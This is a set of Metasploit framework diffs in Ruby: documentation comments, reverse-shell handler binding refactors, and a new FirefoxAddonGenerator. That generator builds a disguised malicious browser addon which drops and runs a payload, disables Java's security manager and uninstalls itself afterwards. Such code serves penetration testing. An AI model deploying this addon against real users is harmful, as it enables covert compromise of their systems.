# -*- coding: binary -*- # -*- coding: binary -*-
module Msf module Msf
###
#
# This class provides a generalized interface to persisting information, # This class provides a generalized interface to persisting information,
# either in whole or in part, about the state of the framework. This can # either in whole or in part, about the state of the framework. This can
# be used to store data that can later be reinitialized in a new instance # be used to store data that can later be reinitialized in a new instance
# of the framework or to provide a simple mechanism for generating reports # of the framework or to provide a simple mechanism for generating reports
# of some form. # of some form.
# #
### # @abstract Subclass and override {#initialize}, {#store}, and {#fetch}.
class PersistentStorage class PersistentStorage
@@storage_classes = {} @@storage_classes = {}
#
# Creates an instance of the storage class with the supplied name. The # Creates an instance of the storage class with the supplied name. The
# array supplied as an argument is passed to the constructor of the # array supplied as an argument is passed to the constructor of the
# associated class as a means of generic initialization. # associated class as a means of generic initialization.
# #
# @param name [String] the name of the storage class.
# @param params [Object] the parameters to give the new class.
# @return [PersistentStorage] the newly created class.
# @return [nil] if class has not been added through {.add_storage_class}.
def self.create(name, *params) def self.create(name, *params)
if (klass = @@storage_classes[name]) if (klass = @@storage_classes[name])
klass.new(*params) klass.new(*params)
@ -27,36 +28,42 @@ class PersistentStorage
end end
end end
#
# Stub initialization routine that takes the params passed to create. # Stub initialization routine that takes the params passed to create.
# #
# @param params [Object] the parameters to initialize with.
def initialize(*params) def initialize(*params)
end end
#
# This methods stores all or part of the current state of the supplied # This methods stores all or part of the current state of the supplied
# framework instance to whatever medium the derived class implements. # framework instance to whatever medium the derived class implements.
# If the derived class does not implement this method, the # If the derived class does not implement this method, the
# NotImplementedError is raised. # NotImplementedError is raised.
# #
# @param framework [Msf::Framework] framework state to store.
# @return [void] no implementation.
# @raise [NotImpementedError] raised if not implemented.
def store(framework) def store(framework)
raise NotImplementedError raise NotImplementedError
end end
#
# This method initializes the supplied framework instance with the state # This method initializes the supplied framework instance with the state
# that is stored in the persisted backing that the derived class # that is stored in the persisted backing that the derived class
# implements. If the derived class does not implement this method, the # implements. If the derived class does not implement this method, the
# NotImplementedError is raised. # NotImplementedError is raised.
# #
# @param framework [Msf::Framework] framework to restore state to.
# @return [void] no implementation.
# @raise [NotImplementedError] raised if not implemented.
def fetch(framework) def fetch(framework)
raise NotImplementedError raise NotImplementedError
end end
#
# This method adds a new storage class to the hash of storage classes that # This method adds a new storage class to the hash of storage classes that
# can be created through create. # can be created through create.
# #
# @param name [String] the name of the storage class.
# @param klass [PersistentStorage] the storage class to add.
# @return [void]
def self.add_storage_class(name, klass) def self.add_storage_class(name, klass)
@@storage_classes[name] = klass @@storage_classes[name] = klass
end end

View File

@ -2,30 +2,29 @@
module Msf module Msf
class PersistentStorage class PersistentStorage
###
#
# This class persists the state of the framework to a flatfile in a human # This class persists the state of the framework to a flatfile in a human
# readable format. At the moment, the level of information it conveys is # readable format. At the moment, the level of information it conveys is
# rather basic and ugly, but this is just a prototype, so it will be improved. # rather basic and ugly, but this is just a prototype, so it will be improved.
# Oh yes, it will be improved. # Oh yes, it will be improved.
#
###
class Flatfile < PersistentStorage class Flatfile < PersistentStorage
#
# Initializes the flatfile for storage based on the parameters specified. # Initializes the flatfile for storage based on the parameters specified.
# The hash must contain a FilePath attribute. # The hash must contain a FilePath attribute.
# #
# @overload initialize(path)
# Initializes the flatfile with the set path.
# @param path [String] path of the flatfile.
def initialize(*params) def initialize(*params)
raise ArgumentError, "You must specify a file path" if (params.length == 0) raise ArgumentError, "You must specify a file path" if (params.length == 0)
self.path = params[0] self.path = params[0]
end end
#
# This method stores the current state of the framework in human readable # This method stores the current state of the framework in human readable
# form to a flatfile. This can be used as a reporting mechanism. # form to a flatfile. This can be used as a reporting mechanism.
# #
# @param framework [Msf:::Framework] the Framework to store.
# @return [void]
def store(framework) def store(framework)
# Open the supplied file path for writing. # Open the supplied file path for writing.
self.fd = File.new(self.path, "w") self.fd = File.new(self.path, "w")
@ -41,10 +40,11 @@ protected
attr_accessor :fd, :path # :nodoc: attr_accessor :fd, :path # :nodoc:
#
# This method stores general information about the current state of the # This method stores general information about the current state of the
# framework instance. # framework instance.
# #
# @param framework [Msf::Framework] the Framework to store.
# @return [void]
def store_general(framework) def store_general(framework)
fd.print( fd.print(
"\n" + "\n" +

View File

@ -2,22 +2,22 @@
module Msf module Msf
module Serializer module Serializer
###
#
# This class formats information in a plain-text format that # This class formats information in a plain-text format that
# is meant to be displayed on a console or some other non-GUI # is meant to be displayed on a console or some other non-GUI
# medium. # medium.
#
###
class ReadableText class ReadableText
#Default number of characters to wrap at.
DefaultColumnWrap = 70 DefaultColumnWrap = 70
#Default number of characters to indent.
DefaultIndent = 2 DefaultIndent = 2
#
# Returns a formatted string that contains information about # Returns a formatted string that contains information about
# the supplied module instance. # the supplied module instance.
# #
# @param mod [Msf::Module] the module to dump information for.
# @param indent [String] the indentation to use.
# @return [String] formatted text output of the dump.
def self.dump_module(mod, indent = " ") def self.dump_module(mod, indent = " ")
case mod.type case mod.type
when MODULE_PAYLOAD when MODULE_PAYLOAD
@ -37,9 +37,14 @@ class ReadableText
end end
end end
#
# Dumps an exploit's targets. # Dumps an exploit's targets.
# #
# @param mod [Msf::Exploit] the exploit module to dump targets
# for.
# @param indent [String] the indentation to use (only the length
# matters).
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_exploit_targets(mod, indent = '', h = nil) def self.dump_exploit_targets(mod, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new( tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length, 'Indent' => indent.length,
@ -57,9 +62,13 @@ class ReadableText
tbl.to_s + "\n" tbl.to_s + "\n"
end end
#
# Dumps the exploit's selected target # Dumps the exploit's selected target
# #
# @param mod [Msf::Exploit] the exploit module.
# @param indent [String] the indentation to use (only the length
# matters)
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_exploit_target(mod, indent = '', h = nil) def self.dump_exploit_target(mod, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new( tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length, 'Indent' => indent.length,
@ -75,9 +84,13 @@ class ReadableText
tbl.to_s + "\n" tbl.to_s + "\n"
end end
#
# Dumps an auxiliary's actions # Dumps an auxiliary's actions
# #
# @param mod [Msf::Auxiliary] the auxiliary module.
# @param indent [String] the indentation to use (only the length
# matters)
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_auxiliary_actions(mod, indent = '', h = nil) def self.dump_auxiliary_actions(mod, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new( tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length, 'Indent' => indent.length,
@ -95,10 +108,14 @@ class ReadableText
tbl.to_s + "\n" tbl.to_s + "\n"
end end
#
# Dumps the table of payloads that are compatible with the supplied # Dumps the table of payloads that are compatible with the supplied
# exploit. # exploit.
# #
# @param exploit [Msf::Exploit] the exploit module.
# @param indent [String] the indentation to use (only the length
# matters)
# @param h [String] the string to display as the table heading.
# @return [String] the string form of the table.
def self.dump_compatible_payloads(exploit, indent = '', h = nil) def self.dump_compatible_payloads(exploit, indent = '', h = nil)
tbl = Rex::Ui::Text::Table.new( tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length, 'Indent' => indent.length,
@ -116,9 +133,11 @@ class ReadableText
tbl.to_s + "\n" tbl.to_s + "\n"
end end
#
# Dumps information about an exploit module. # Dumps information about an exploit module.
# #
# @param mod [Msf::Exploit] the exploit module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_exploit_module(mod, indent = '') def self.dump_exploit_module(mod, indent = '')
output = "\n" output = "\n"
output << " Name: #{mod.name}\n" output << " Name: #{mod.name}\n"
@ -171,9 +190,11 @@ class ReadableText
end end
#
# Dumps information about an auxiliary module. # Dumps information about an auxiliary module.
# #
# @param mod [Msf::Auxiliary] the auxiliary module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_auxiliary_module(mod, indent = '') def self.dump_auxiliary_module(mod, indent = '')
output = "\n" output = "\n"
output << " Name: #{mod.name}\n" output << " Name: #{mod.name}\n"
@ -207,9 +228,11 @@ class ReadableText
return output return output
end end
#
# Dumps information about a payload module. # Dumps information about a payload module.
# #
# @param mod [Msf::Payload] the payload module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_payload_module(mod, indent = '') def self.dump_payload_module(mod, indent = '')
# General # General
output = "\n" output = "\n"
@ -244,9 +267,11 @@ class ReadableText
return output return output
end end
#
# Dumps information about a module, just the basics. # Dumps information about a module, just the basics.
# #
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_basic_module(mod, indent = '') def self.dump_basic_module(mod, indent = '')
# General # General
output = "\n" output = "\n"
@ -277,13 +302,16 @@ class ReadableText
end end
#No current use
def self.dump_generic_module(mod, indent = '') def self.dump_generic_module(mod, indent = '')
end end
#
# Dumps the list of options associated with the # Dumps the list of options associated with the
# supplied module. # supplied module.
# #
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_options(mod, indent = '') def self.dump_options(mod, indent = '')
tbl = Rex::Ui::Text::Table.new( tbl = Rex::Ui::Text::Table.new(
'Indent' => indent.length, 'Indent' => indent.length,
@ -309,9 +337,11 @@ class ReadableText
return tbl.to_s return tbl.to_s
end end
#
# Dumps the advanced options associated with the supplied module. # Dumps the advanced options associated with the supplied module.
# #
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_advanced_options(mod, indent = '') def self.dump_advanced_options(mod, indent = '')
output = '' output = ''
pad = indent pad = indent
@ -333,9 +363,11 @@ class ReadableText
return output return output
end end
#
# Dumps the evasion options associated with the supplied module. # Dumps the evasion options associated with the supplied module.
# #
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_evasion_options(mod, indent = '') def self.dump_evasion_options(mod, indent = '')
output = '' output = ''
pad = indent pad = indent
@ -358,6 +390,11 @@ class ReadableText
return output return output
end end
# Dumps the references associated with the supplied module.
#
# @param mod [Msf::Module] the module.
# @param indent [String] the indentation to use.
# @return [String] the string form of the information.
def self.dump_references(mod, indent = '') def self.dump_references(mod, indent = '')
output = '' output = ''
@ -372,9 +409,13 @@ class ReadableText
output output
end end
#
# Dumps the contents of a datastore. # Dumps the contents of a datastore.
# #
# @param name [String] displayed as the table header.
# @param ds [Msf::DataStore] the DataStore to dump.
# @param indent [Integer] the indentation size.
# @param col [Integer] the column width.
# @return [String] the formatted DataStore contents.
def self.dump_datastore(name, ds, indent = DefaultIndent, col = DefaultColumnWrap) def self.dump_datastore(name, ds, indent = DefaultIndent, col = DefaultColumnWrap)
tbl = Rex::Ui::Text::Table.new( tbl = Rex::Ui::Text::Table.new(
'Indent' => indent, 'Indent' => indent,
@ -392,9 +433,17 @@ class ReadableText
return ds.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No entries in data store.\n" return ds.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No entries in data store.\n"
end end
#
# Dumps the list of active sessions. # Dumps the list of active sessions.
# #
# @param framework [Msf::Framework] the framework to dump.
# @param opts [Hash] the options to dump with.
# @option opts :session_ids [Array] the list of sessions to dump (no
# effect).
# @option opts :verbose [Boolean] gives more information if set to
# true.
# @option opts :indent [Integer] set the indentation amount.
# @option opts :col [Integer] the column wrap width.
# @return [String] the formatted list of sessions.
def self.dump_sessions(framework, opts={}) def self.dump_sessions(framework, opts={})
ids = (opts[:session_ids] || framework.sessions.keys).sort ids = (opts[:session_ids] || framework.sessions.keys).sort
verbose = opts[:verbose] || false verbose = opts[:verbose] || false
@ -437,12 +486,14 @@ class ReadableText
return framework.sessions.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active sessions.\n" return framework.sessions.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active sessions.\n"
end end
#
# Dumps the list of running jobs. # Dumps the list of running jobs.
# #
# If verbose is true, also prints the payload, LPORT, URIPATH and start # @param framework [Msf::Framework] the framework.
# time, if they exist, for each job. # @param verbose [Boolean] if true, also prints the payload, LPORT, URIPATH
# # and start time, if they exist, for each job.
# @param indent [Integer] the indentation amount.
# @param col [Integer] the column wrap width.
# @return [String] the formatted list of running jobs.
def self.dump_jobs(framework, verbose = false, indent = DefaultIndent, col = DefaultColumnWrap) def self.dump_jobs(framework, verbose = false, indent = DefaultIndent, col = DefaultColumnWrap)
columns = [ 'Id', 'Name' ] columns = [ 'Id', 'Name' ]
@ -479,10 +530,13 @@ class ReadableText
return framework.jobs.keys.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active jobs.\n" return framework.jobs.keys.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active jobs.\n"
end end
#
# Jacked from Ernest Ellingson <erne [at] powernav.com>, modified # Jacked from Ernest Ellingson <erne [at] powernav.com>, modified
# a bit to add indention # a bit to add indention
# #
# @param str [String] the string to wrap.
# @param indent [Integer] the indentation amount.
# @param col [Integer] the column wrap width.
# @return [String] the wrapped string.
def self.word_wrap(str, indent = DefaultIndent, col = DefaultColumnWrap) def self.word_wrap(str, indent = DefaultIndent, col = DefaultColumnWrap)
return Rex::Text.wordwrap(str, indent, col) return Rex::Text.wordwrap(str, indent, col)
end end

View File

@ -98,4 +98,7 @@ require 'msf/core/exploit/winrm'
# WebApp # WebApp
require 'msf/core/exploit/web' require 'msf/core/exploit/web'
# Firefox addons
require 'msf/core/exploit/remote/firefox_addon_generator'
require 'msf/core/exploit/remote/browser_exploit_server' require 'msf/core/exploit/remote/browser_exploit_server'

View File

@ -92,6 +92,15 @@ module Msf
"#{get_resource.chomp("/")}/#{@exploit_receiver_page}" "#{get_resource.chomp("/")}/#{@exploit_receiver_page}"
end end
#
# Returns the absolute URL to the module's resource that points to on_request_exploit
#
# @return [String] absolute URI to the exploit page
#
def get_module_uri
"#{get_uri.chomp("/")}/#{@exploit_receiver_page}"
end
# #
# Returns the current target # Returns the current target
# #
@ -166,8 +175,10 @@ module Msf
# Special keys to ignore because the script registers this as [:activex] = true or false # Special keys to ignore because the script registers this as [:activex] = true or false
next if k == :clsid or k == :method next if k == :clsid or k == :method
if v.class == Regexp if v.is_a? Regexp
bad_reqs << k if profile[k.to_sym] !~ v bad_reqs << k if profile[k.to_sym] !~ v
elsif v.is_a? Proc
bad_reqs << k unless v.call(profile[k.to_sym])
else else
bad_reqs << k if profile[k.to_sym] != v bad_reqs << k if profile[k.to_sym] != v
end end

View File

@ -0,0 +1,174 @@
# -*- coding: binary -*-
###
#
# The FirefoxAddonGenerator allows a firefox exploit module to serve a malicious .xpi
# addon that will gain a session.
#
###
module Msf
module Exploit::Remote::FirefoxAddonGenerator
# Add in the supported datastore options
def initialize( info = {} )
super(update_info(info,
'Platform' => %w{ java linux osx solaris win },
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Platform' => ['java'],
'Arch' => ARCH_JAVA
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
}
],
[ 'Mac OS X PPC (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
]
],
'DefaultTarget' => 1
))
register_options( [
OptString.new('ADDONNAME', [ true,
"The addon name.",
"HTML5 Rendering Enhancements"
]),
OptBool.new('AutoUninstall', [ true,
"Automatically uninstall the addon after payload execution",
true
])
], self.class)
end
# @return [Rex::Zip::Archive] containing a .xpi, ready to be served with the
# 'application/x-xpinstall' MIME type
def generate_addon_xpi
if target.name == 'Generic (Java Payload)'
jar = p.encoded_jar
jar.build_manifest(:main_class => "metasploit.Payload")
payload_file = jar.pack
payload_name='payload.jar'
payload_script=%q|
var java = Components.classes["@mozilla.org/appshell/window-mediator;1"].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow('navigator:browser').Packages.java
java.lang.System.setSecurityManager(null);
var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]);
var m = cl.loadClass("metasploit.Payload").getMethod("main", [java.lang.Class.forName("[Ljava.lang.String;")]);
m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]);
|
else
payload_file = generate_payload_exe
payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
payload_script=%q|
var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
process.init(tmp);
process.run(false,[],0);
|
if target.name != 'Windows x86 (Native Payload)'
payload_script = %q|
var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
chmod.initWithPath("/bin/chmod");
var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
process.init(chmod);
process.run(true, ["+x", tmp.path], 2);
| + payload_script
end
end
zip = Rex::Zip::Archive.new
xpi_guid = Rex::Text.rand_guid
bootstrap_script = %q|
function startup(data, reason) {
var file = Components.classes["@mozilla.org/file/directory_service;1"].
getService(Components.interfaces.nsIProperties).
get("ProfD", Components.interfaces.nsIFile);
file.append("extensions");
|
bootstrap_script << %Q|xpi_guid="#{xpi_guid}";|
bootstrap_script << %Q|payload_name="#{payload_name}";|
bootstrap_script << %q|
file.append(xpi_guid);
file.append(payload_name);
var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
getService(Components.interfaces.nsIProperties).
get("TmpD", Components.interfaces.nsIFile);
tmp.append(payload_name);
tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
file.copyTo(tmp.parent, tmp.leafName);
|
bootstrap_script << payload_script
if (datastore['AutoUninstall'])
bootstrap_script << %q|
try { // Fx < 4.0
Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
} catch (e) {}
try { // Fx 4.0 and later
Components.utils.import("resource://gre/modules/AddonManager.jsm");
AddonManager.getAddonByID(xpi_guid, function(addon) {
addon.uninstall();
});
} catch (e) {}
|
end
bootstrap_script << "}"
zip.add_file('bootstrap.js', bootstrap_script)
zip.add_file(payload_name, payload_file)
zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n")
zip.add_file('install.rdf', %Q|<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<Description about="urn:mozilla:install-manifest">
<em:id>#{xpi_guid}</em:id>
<em:name>#{datastore['ADDONNAME']}</em:name>
<em:version>1.0</em:version>
<em:bootstrap>true</em:bootstrap>
<em:unpack>true</em:unpack>
<em:targetApplication>
<Description>
<em:id>toolkit@mozilla.org</em:id>
<em:minVersion>1.0</em:minVersion>
<em:maxVersion>*</em:maxVersion>
</Description>
</em:targetApplication>
<em:targetApplication>
<Description>
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
<em:minVersion>1.0</em:minVersion>
<em:maxVersion>*</em:maxVersion>
</Description>
</em:targetApplication>
</Description>
</RDF>|)
zip.add_file('overlay.xul', %q|<?xml version="1.0"?>
<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
<script src="bootstrap.js"/>
<script><![CDATA[window.addEventListener("load", function(e) { startup(); }, false);]]></script>
</overlay>|)
zip
end
end
end

View File

@ -83,23 +83,10 @@ module ReverseHttp
# addresses. # addresses.
# #
def full_uri def full_uri
unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty? addrs = bind_address
lhost = datastore['HIDDENHOST'] local_port = bind_port
else
lhost = datastore['LHOST']
end
if lhost.empty? or lhost == "0.0.0.0" or lhost == "::"
lhost = Rex::Socket.source_address
end
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
scheme = (ssl?) ? "https" : "http" scheme = (ssl?) ? "https" : "http"
unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0 "#{scheme}://#{addrs[0]}:#{local_port}/"
uri = "#{scheme}://#{lhost}:#{datastore["HIDDENPORT"]}/"
else
uri = "#{scheme}://#{lhost}:#{datastore["LPORT"]}/"
end
uri
end end
# #
@ -163,6 +150,7 @@ module ReverseHttp
OptString.new('MeterpreterUserAgent', [ false, 'The user-agent that the payload should use for communication', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' ]), OptString.new('MeterpreterUserAgent', [ false, 'The user-agent that the payload should use for communication', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' ]),
OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]), OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]),
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']), OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>' ]) OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>' ])
], Msf::Handler::ReverseHttp) ], Msf::Handler::ReverseHttp)
end end
@ -186,17 +174,13 @@ module ReverseHttp
comm = nil comm = nil
end end
# Determine where to bind the HTTP(S) server to local_port = bind_port
bindaddrs = ipv6 ? '::' : '0.0.0.0' addrs = bind_address
if not datastore['ReverseListenerBindAddress'].to_s.empty?
bindaddrs = datastore['ReverseListenerBindAddress']
end
# Start the HTTPS server service on this host/port # Start the HTTPS server service on this host/port
self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server, self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server,
datastore['LPORT'].to_i, local_port,
bindaddrs, addrs[0],
ssl?, ssl?,
{ {
'Msf' => framework, 'Msf' => framework,
@ -413,6 +397,33 @@ protected
obj.service.close_client( cli ) obj.service.close_client( cli )
end end
protected
def bind_port
port = datastore['ReverseListenerBindPort'].to_i
port > 0 ? port : datastore['LPORT'].to_i
end
def bind_address
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs
end
end end

View File

@ -42,13 +42,17 @@ module ReverseHttpsProxy
OptPort.new('LPORT', [ true, "The local listener port", 8443 ]), OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]), OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]),
OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]), OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]),
OptString.new('HIDDENHOST', [false, "The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation"]),
OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]),
OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]), OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]),
OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]), OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]),
OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"]) OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"])
], Msf::Handler::ReverseHttpsProxy) ], Msf::Handler::ReverseHttpsProxy)
register_advanced_options(
[
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ])
], Msf::Handler::ReverseHttpsProxy)
end end
end end

View File

@ -53,8 +53,9 @@ module ReverseTcp
[ [
OptInt.new('ReverseConnectRetries', [ true, 'The number of connection attempts to try before exiting the process', 5 ]), OptInt.new('ReverseConnectRetries', [ true, 'The number of connection attempts to try before exiting the process', 5 ]),
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']), OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']), OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]), OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false])
], Msf::Handler::ReverseTcp) ], Msf::Handler::ReverseTcp)
@ -72,13 +73,6 @@ module ReverseTcp
end end
ex = false ex = false
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
comm = datastore['ReverseListenerComm'] comm = datastore['ReverseListenerComm']
if comm.to_s == "local" if comm.to_s == "local"
@ -87,19 +81,15 @@ module ReverseTcp
comm = nil comm = nil
end end
if not datastore['ReverseListenerBindAddress'].to_s.empty? local_port = bind_port
# Only try to bind to this specific interface addrs = bind_address
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs.each { |ip| addrs.each { |ip|
begin begin
self.listener_sock = Rex::Socket::TcpServer.create( self.listener_sock = Rex::Socket::TcpServer.create(
'LocalHost' => ip, 'LocalHost' => ip,
'LocalPort' => datastore['LPORT'].to_i, 'LocalPort' => local_port,
'Comm' => comm, 'Comm' => comm,
'Context' => 'Context' =>
{ {
@ -119,11 +109,11 @@ module ReverseTcp
via = "" via = ""
end end
print_status("Started reverse handler on #{ip}:#{datastore['LPORT']} #{via}") print_status("Started reverse handler on #{ip}:#{local_port} #{via}")
break break
rescue rescue
ex = $! ex = $!
print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}") print_error("Handler failed to bind to #{ip}:#{local_port}")
end end
} }
raise ex if (ex) raise ex if (ex)
@ -140,7 +130,8 @@ module ReverseTcp
# Starts monitoring for an inbound connection. # Starts monitoring for an inbound connection.
# #
def start_handler def start_handler
self.listener_thread = framework.threads.spawn("ReverseTcpHandlerListener-#{datastore['LPORT']}", false) { local_port = bind_port
self.listener_thread = framework.threads.spawn("ReverseTcpHandlerListener-#{local_port}", false) {
client = nil client = nil
begin begin
@ -159,7 +150,7 @@ module ReverseTcp
end while true end while true
} }
self.handler_thread = framework.threads.spawn("ReverseTcpHandlerWorker-#{datastore['LPORT']}", false) { self.handler_thread = framework.threads.spawn("ReverseTcpHandlerWorker-#{local_port}", false) {
while true while true
client = self.handler_queue.pop client = self.handler_queue.pop
begin begin
@ -241,6 +232,31 @@ module ReverseTcp
protected protected
def bind_port
port = datastore['ReverseListenerBindPort'].to_i
port > 0 ? port : datastore['LPORT'].to_i
end
def bind_address
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs
end
attr_accessor :listener_sock # :nodoc: attr_accessor :listener_sock # :nodoc:
attr_accessor :listener_thread # :nodoc: attr_accessor :listener_thread # :nodoc:
attr_accessor :handler_thread # :nodoc: attr_accessor :handler_thread # :nodoc:

View File

@ -43,7 +43,9 @@ module ReverseTcpSsl
super super
register_advanced_options( register_advanced_options(
[ [
OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']) OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']),
OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ])
], Msf::Handler::ReverseTcpSsl) ], Msf::Handler::ReverseTcpSsl)
end end
@ -59,13 +61,6 @@ module ReverseTcpSsl
end end
ex = false ex = false
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
